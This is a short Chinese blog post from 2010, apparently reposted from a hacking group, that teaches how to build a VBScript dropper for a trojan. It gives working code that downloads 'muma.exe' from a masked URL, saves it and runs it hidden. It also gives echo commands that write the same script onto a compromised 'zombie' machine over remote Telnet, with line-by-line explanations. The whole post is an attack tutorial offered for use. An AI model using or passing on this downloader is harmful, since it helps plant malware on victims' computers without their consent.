制作自动运行木马的vbs脚本

制作自动运行木马的vbs脚本
2010年05月17日
　　自动下载并运行的VBS脚本代码 转自二进制小组
　　Set xPost = CreateObject("Microsoft.XMLHTTP")
　　xPost.Open "GET","http://www.***/muma.exe ",0
　　xPost.Send()
　　Set sGet = CreateObject("ADODB.Stream")
　　sGet.Mode = 3 
　　sGet.Type = 1 
　　sGet.Open()
　　sGet.Write(xPost.responseBody)
　　sGet.SaveToFile "muma.exe",2
　　set ws=wscript.createobject("wscript.shell")
　　ws.run "muma.exe /start",0
　　把上面的代码复制到一个文档里.另存为**.vbs,然后运行**.vbs就相当于运行你的木马了.
　　echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>c:\1.vbs
　　echo xPost.Open "GET","http://www.***/muma.exe",0 >>c:\1.vbs
　　echo xPost.Send() >>c:\1.vbs
　　echo Set sGet = CreateObject("ADODB.Stream") >>c:\1.vbs
　　echo sGet.Mode = 3 >>c:\1.vbs
　　echo sGet.Type = 1 >>c:\1.vbs 
　　echo sGet.Open() >>c:\1.vbs
　　echo sGet.Write(xPost.responseBody) >>c:\1.vbs
　　echo sGet.SaveToFile "muma.exe",2 >>c:\1.vbs
　　echo set ws=wscript.createobject("wscript.shell") >>c:\1.vbs
　　echo ws.run "muma.exe /start",0 >>c:\1.vbs
　　另外如果是远程Tenet的话就直接复制这段代码回车就可以在肉鸡上写一个1.VBS脚本了.
　　>>c:\1.vbs 的意思就是把代码写到肉鸡C盘下的1.vbs
　　xPost.Open "GET","http://www.***/muma.exe",0
　　这段代码的意思就是下载你的木马
　　sGet.SaveToFile "muma.exe",2
　　这段代码的意思是保存木马到当前目录下文件名为muma.exe
　　ws.run "muma.exe /start",0
　　这段代码的意思是运行muma.exe
　　大家可以用自己电脑试一下的,开始→运行→输入CMD→再输入上面的代码.看看你的C盘是不是多了一个1.vbs   右键编辑看看里面的内容是不是这段代码?